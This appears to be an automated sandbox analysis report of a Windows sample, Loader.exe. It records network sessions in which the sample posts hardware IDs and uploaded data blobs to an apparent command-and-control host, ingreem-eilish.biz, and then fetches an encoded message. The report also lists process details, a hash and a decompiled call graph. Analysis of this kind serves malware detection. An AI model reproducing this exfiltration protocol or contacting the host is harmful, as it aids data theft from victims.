                                                                                      2024-12-20 16:41:47 UTC1369INData Raw: 6d 38 69 48 4c 63 67 46 46 5a 49 43 6a 52 2f 61 45 5a 56 45 4d 4e 4a 36 71 52 73 69 39 6c 73 4b 66 4b 54 33 4c 32 62 71 31 56 73 65 79 2f 5a 38 6d 44 47 47 42 65 53 34 50 69 38 55 4a 57 58 78 49 6b 72 49 66 7a 47 6c 6a 4d 71 50 46 65 64 65 68 71 72 7a 37 4c 6f 73 34 70 69 6f 34 45 59 41 34 47 6a 2f 32 72 48 56 5a 74 54 6a 72 38 6b 76 46 6e 4d 63 44 5a 39 52 30 74 70 69 72 68 66 59 71 74 67 48 4c 59 6b 52 42 6b 43 41 61 45 78 49 38 31 48 58 4d 51 4c 71 32 4a 74 53 6c 63 73 4c 37 68 57 48 4c 59 55 39 68 68 6a 4c 37 4d 56 38 6d 56 46 53 64 51 52 64 75 36 36 56 6f 78 64 41 55 6b 2f 4d 72 78 4f 79 4c 57 32 63 68 57 64 50 5a 67 2f 6e 32 50 75 4d 78 57 7a 49 59 52 4a 31 42 46 7a 37 72 70 57 68 6c 6a 42 79 57 35 67 2f 30 34 65 49 6e 5a 71 52 31 37 70 6a 57 76 66
                                                                                      Data Ascii: m8iHLcgFFZICjR/aEZVEMNJ6qRsi9lsKfKT3L2bq1Vsey/Z8mDGGBeS4Pi8UJWXxIkrIfzGljMqPFedehqrz7Los4pio4EYA4Gj/2rHVZtTjr8kvFnMcDZ9R0tpirhfYqtgHLYkRBkCAaExI81HXMQLq2JtSlcsL7hWHLYU9hhjL7MV8mVFSdQRdu66VoxdAUk/MrxOyLW2chWdPZg/n2PuMxWzIYRJ1BFz7rpWhljByW5g/04eInZqR17pjWvf


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.549767104.21.90.1354436448C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-20 16:41:48 UTC277OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=O9SCPS6TVHZ
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 12800
                                                                                      Host: ingreem-eilish.biz
                                                                                      2024-12-20 16:41:48 UTC12800OUTData Raw: 2d 2d 4f 39 53 43 50 53 36 54 56 48 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 31 33 42 41 43 45 33 34 41 32 42 30 35 45 32 35 45 30 35 34 44 31 36 34 41 33 37 36 30 36 0d 0a 2d 2d 4f 39 53 43 50 53 36 54 56 48 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 39 53 43 50 53 36 54 56 48 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 0d 0a 2d 2d 4f 39 53 43 50 53 36 54 56 48
                                                                                      Data Ascii: --O9SCPS6TVHZContent-Disposition: form-data; name="hwid"A313BACE34A2B05E25E054D164A37606--O9SCPS6TVHZContent-Disposition: form-data; name="pid"2--O9SCPS6TVHZContent-Disposition: form-data; name="lid"HpOoIh--b58c2f805636--O9SCPS6TVH
                                                                                      2024-12-20 16:41:49 UTC1049INHTTP/1.1 200 OK
                                                                                      Date: Fri, 20 Dec 2024 16:41:49 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=bkluelm2a8s5kqstgf6r48n8c8; expires=Tue, 15-Apr-2025 10:28:28 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSqLIVx%2BvulCGfFnW92sRm2pMmdQbCcDi8LmQ6dEd3gGPzKOGg%2BoCAdcM%2BgwRTlClVyd07LuDMULnN%2FJI%2B5lJ%2BduR5DKWKirgeCqlTppFbnOYcn%2FzGZ2VpPkHsrKxYoA42i3IzM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f5115002cec180d-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1626&rtt_var=623&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13735&delivery_rate=1795817&cwnd=201&unsent_bytes=0&cid=dd3dab1b34552bfc&ts=794&x=0"
                                                                                      2024-12-20 16:41:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-20 16:41:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.549773104.21.90.1354436448C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-20 16:41:50 UTC274OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=XPBUSMJF
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 15024
                                                                                      Host: ingreem-eilish.biz
                                                                                      2024-12-20 16:41:50 UTC15024OUTData Raw: 2d 2d 58 50 42 55 53 4d 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 31 33 42 41 43 45 33 34 41 32 42 30 35 45 32 35 45 30 35 34 44 31 36 34 41 33 37 36 30 36 0d 0a 2d 2d 58 50 42 55 53 4d 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 50 42 55 53 4d 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 0d 0a 2d 2d 58 50 42 55 53 4d 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                      Data Ascii: --XPBUSMJFContent-Disposition: form-data; name="hwid"A313BACE34A2B05E25E054D164A37606--XPBUSMJFContent-Disposition: form-data; name="pid"2--XPBUSMJFContent-Disposition: form-data; name="lid"HpOoIh--b58c2f805636--XPBUSMJFContent-D
                                                                                      2024-12-20 16:41:51 UTC1053INHTTP/1.1 200 OK
                                                                                      Date: Fri, 20 Dec 2024 16:41:51 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=upitb5gjoait2p9ejqnmscb455; expires=Tue, 15-Apr-2025 10:28:30 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dAUybXU4W5xk399ux8Qnhd46ZV8RbBsR3UHmcsXT%2BVVWNjVBWE2bswLLMhsaBL0%2FUNK6EpBgiStq2Ha%2BvXt807FqawL%2BAe%2FAceiSKs%2Bp6jV%2F5UpzncJdYtkFzxLA%2FN%2BfVVyZaiQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f51150dac097279-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1784&rtt_var=690&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=15956&delivery_rate=1562332&cwnd=220&unsent_bytes=0&cid=7d2ab8c79e6c8a42&ts=811&x=0"
                                                                                      2024-12-20 16:41:51 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-20 16:41:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.549780104.21.90.1354436448C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-20 16:41:53 UTC279OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=3905CUVZJU7SA
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 20544
                                                                                      Host: ingreem-eilish.biz
                                                                                      2024-12-20 16:41:53 UTC15331OUTData Raw: 2d 2d 33 39 30 35 43 55 56 5a 4a 55 37 53 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 31 33 42 41 43 45 33 34 41 32 42 30 35 45 32 35 45 30 35 34 44 31 36 34 41 33 37 36 30 36 0d 0a 2d 2d 33 39 30 35 43 55 56 5a 4a 55 37 53 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 39 30 35 43 55 56 5a 4a 55 37 53 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 0d 0a 2d 2d 33 39 30 35
                                                                                      Data Ascii: --3905CUVZJU7SAContent-Disposition: form-data; name="hwid"A313BACE34A2B05E25E054D164A37606--3905CUVZJU7SAContent-Disposition: form-data; name="pid"3--3905CUVZJU7SAContent-Disposition: form-data; name="lid"HpOoIh--b58c2f805636--3905
                                                                                      2024-12-20 16:41:53 UTC5213OUTData Raw: 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: 'F3Wun 4F([:7s~X`nO`i
                                                                                      2024-12-20 16:41:54 UTC1046INHTTP/1.1 200 OK
                                                                                      Date: Fri, 20 Dec 2024 16:41:54 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=pvnm7pcr77efra08s80nk5gc9g; expires=Tue, 15-Apr-2025 10:28:33 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bgv%2FPLKDM4F5jAUwgESKHtaHQneLwEOdskX%2BhkFrYQBw4sULTH%2BSQdtf%2Ba3%2BfeRncVxrvZKwYlaJZzScVCPI3nXkmMNhhKmSgqHvQi9LEu3JxMaU5BB6MijqnGsWbQnJfs2usBc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f51151dfee10f9d-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1652&rtt_var=635&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21503&delivery_rate=1703617&cwnd=193&unsent_bytes=0&cid=80fbfb6220fe826a&ts=917&x=0"
                                                                                      2024-12-20 16:41:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-20 16:41:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.549786104.21.90.1354436448C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-20 16:41:55 UTC278OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=UB51S031P6CFI
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 1230
                                                                                      Host: ingreem-eilish.biz
                                                                                      2024-12-20 16:41:55 UTC1230OUTData Raw: 2d 2d 55 42 35 31 53 30 33 31 50 36 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 31 33 42 41 43 45 33 34 41 32 42 30 35 45 32 35 45 30 35 34 44 31 36 34 41 33 37 36 30 36 0d 0a 2d 2d 55 42 35 31 53 30 33 31 50 36 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 42 35 31 53 30 33 31 50 36 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 0d 0a 2d 2d 55 42 35 31
                                                                                      Data Ascii: --UB51S031P6CFIContent-Disposition: form-data; name="hwid"A313BACE34A2B05E25E054D164A37606--UB51S031P6CFIContent-Disposition: form-data; name="pid"1--UB51S031P6CFIContent-Disposition: form-data; name="lid"HpOoIh--b58c2f805636--UB51
                                                                                      2024-12-20 16:41:56 UTC1043INHTTP/1.1 200 OK
                                                                                      Date: Fri, 20 Dec 2024 16:41:56 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=r8rigetc9kkjn6skt8gdeqp0sr; expires=Tue, 15-Apr-2025 10:28:35 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUDzw6eJz00C3eLGQ4zgioVtaz8b52j8jzc%2B%2BBL6XM1wd9UgdpfBKDh%2B6w7dUTIcDIGngOxhh0lsOwEYtfLuQEaH%2B67AmY6Vlu6y%2B6IMEKAQ7vu9gwF83GuM0b1ugn4HJ4fFhdQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f51152dab8ec334-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1642&rtt_var=648&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2144&delivery_rate=1646926&cwnd=247&unsent_bytes=0&cid=23074676cf024360&ts=680&x=0"
                                                                                      2024-12-20 16:41:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-20 16:41:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.549792104.21.90.1354436448C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-20 16:41:57 UTC277OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=AL2QEEAZ77KV
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 1093
                                                                                      Host: ingreem-eilish.biz
                                                                                      2024-12-20 16:41:57 UTC1093OUTData Raw: 2d 2d 41 4c 32 51 45 45 41 5a 37 37 4b 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 31 33 42 41 43 45 33 34 41 32 42 30 35 45 32 35 45 30 35 34 44 31 36 34 41 33 37 36 30 36 0d 0a 2d 2d 41 4c 32 51 45 45 41 5a 37 37 4b 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 4c 32 51 45 45 41 5a 37 37 4b 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 0d 0a 2d 2d 41 4c 32 51 45 45 41
                                                                                      Data Ascii: --AL2QEEAZ77KVContent-Disposition: form-data; name="hwid"A313BACE34A2B05E25E054D164A37606--AL2QEEAZ77KVContent-Disposition: form-data; name="pid"1--AL2QEEAZ77KVContent-Disposition: form-data; name="lid"HpOoIh--b58c2f805636--AL2QEEA
                                                                                      2024-12-20 16:41:59 UTC1048INHTTP/1.1 200 OK
                                                                                      Date: Fri, 20 Dec 2024 16:41:59 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=8j1md37tfgc26tio5m04va1nod; expires=Tue, 15-Apr-2025 10:28:38 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=88HP2xnKzjttUfS%2B%2F%2FCBQtkOVD7%2Bag6DaPEED6RJJm0OoEdiX%2FV4qG6scy239NhKfevXfOwHWzCpDf5QKTB1xD3DxmFaMZeeZ2QH4HarE87VZ2dxcbyLR%2FKs%2FBtlN4ua95rdrag%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f511539dabd4299-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1720&rtt_var=659&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2006&delivery_rate=1643218&cwnd=251&unsent_bytes=0&cid=1ef9fe110a2215b7&ts=1708&x=0"
                                                                                      2024-12-20 16:41:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-20 16:41:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.549799104.21.90.1354436448C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-20 16:42:00 UTC267OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 121
                                                                                      Host: ingreem-eilish.biz
                                                                                      2024-12-20 16:42:00 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 41 33 31 33 42 41 43 45 33 34 41 32 42 30 35 45 32 35 45 30 35 34 44 31 36 34 41 33 37 36 30 36
                                                                                      Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--b58c2f805636&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=A313BACE34A2B05E25E054D164A37606
                                                                                      2024-12-20 16:42:01 UTC1043INHTTP/1.1 200 OK
                                                                                      Date: Fri, 20 Dec 2024 16:42:01 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=m8npprpufnbjsou27p7feev2pc; expires=Tue, 15-Apr-2025 10:28:40 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Ja%2BHLHiGk%2BB0RpMoemnyNUfPKKJ0CyX4KDkzgOAWaH4lQELGgWMVR3opkqAS1nW9JYk9UKdCvv6waXpZB1UaHls1q%2Bp1ts%2FfZ0J4qTySbpLCczSDZryBWgUX%2FDjiJSIKh6ICzY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f51154cef6b5e6e-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1585&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1024&delivery_rate=1842271&cwnd=235&unsent_bytes=0&cid=b30f812b32f84506&ts=835&x=0"
                                                                                      2024-12-20 16:42:01 UTC54INData Raw: 33 30 0d 0a 34 45 47 36 52 67 58 54 46 6e 50 46 77 71 48 33 51 47 78 67 75 74 4c 4a 33 30 79 76 67 5a 78 69 49 6c 51 37 35 48 43 72 76 76 79 37 48 41 3d 3d 0d 0a
                                                                                      Data Ascii: 304EG6RgXTFnPFwqH3QGxgutLJ30yvgZxiIlQ75HCrvvy7HA==
                                                                                      2024-12-20 16:42:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:11:41:22
                                                                                      Start date:20/12/2024
                                                                                      Path:C:\Users\user\Desktop\Loader.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                      Imagebase:0xef0000
                                                                                      File size:3'208'704 bytes
                                                                                      MD5 hash:99604EF7EBF56A566A0CDB4B6BB0FA08
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:6.2%
                                                                                        Dynamic/Decrypted Code Coverage:80.3%
                                                                                        Signature Coverage:52%
                                                                                        Total number of Nodes:304
                                                                                        Total number of Limit Nodes:22
                                                                                        execution_graph 19748 421a80 19749 43e430 LdrInitializeThunk 19748->19749 19753 421ac3 19749->19753 19750 421acf 19752 4221f5 19754 43a940 RtlFreeHeap 19752->19754 19753->19750 19758 421bc5 19753->19758 19760 43c330 LdrInitializeThunk 19753->19760 19755 422207 19754->19755 19755->19750 19762 43c330 LdrInitializeThunk 19755->19762 19758->19752 19759 43a940 RtlFreeHeap 19758->19759 19761 43c330 LdrInitializeThunk 19758->19761 19759->19758 19760->19753 19761->19758 19762->19755 19561 42f3c1 CoSetProxyBlanket 19763 43ec80 19764 43eca0 19763->19764 19764->19764 19767 43ecfe 19764->19767 19771 43c330 LdrInitializeThunk 19764->19771 19765 43ef4c 19767->19765 19770 43ee2f 19767->19770 19772 43c330 LdrInitializeThunk 19767->19772 19768 43a940 RtlFreeHeap 19768->19765 19770->19768 19771->19767 19772->19770 19562 4085d0 19564 4085df 19562->19564 19563 4087e3 ExitProcess 19564->19563 19565 4085f4 GetCurrentProcessId GetCurrentThreadId 19564->19565 19566 4087de 19564->19566 19568 408621 19565->19568 19569 408625 SHGetSpecialFolderPathW GetForegroundWindow 19565->19569 19575 43c2b0 19566->19575 19568->19569 19570 408736 19569->19570 19570->19566 19574 40c5c0 CoInitializeEx 19570->19574 19578 43d930 19575->19578 19577 43c2b5 FreeLibrary 19577->19563 19579 43d939 19578->19579 19579->19577 19773 43ca12 19774 43ca20 19773->19774 19774->19774 19777 43ca5e 19774->19777 19779 43c330 LdrInitializeThunk 19774->19779 19775 43cb02 19777->19775 19780 43c330 LdrInitializeThunk 19777->19780 19779->19777 19780->19775 19781 42d793 19783 42d79e 19781->19783 19786 4377e0 19783->19786 19784 42d7ac 19785 4377e0 LdrInitializeThunk 19784->19785 19785->19784 19787 4377ee 19786->19787 19791 4378dd 19787->19791 19795 43c330 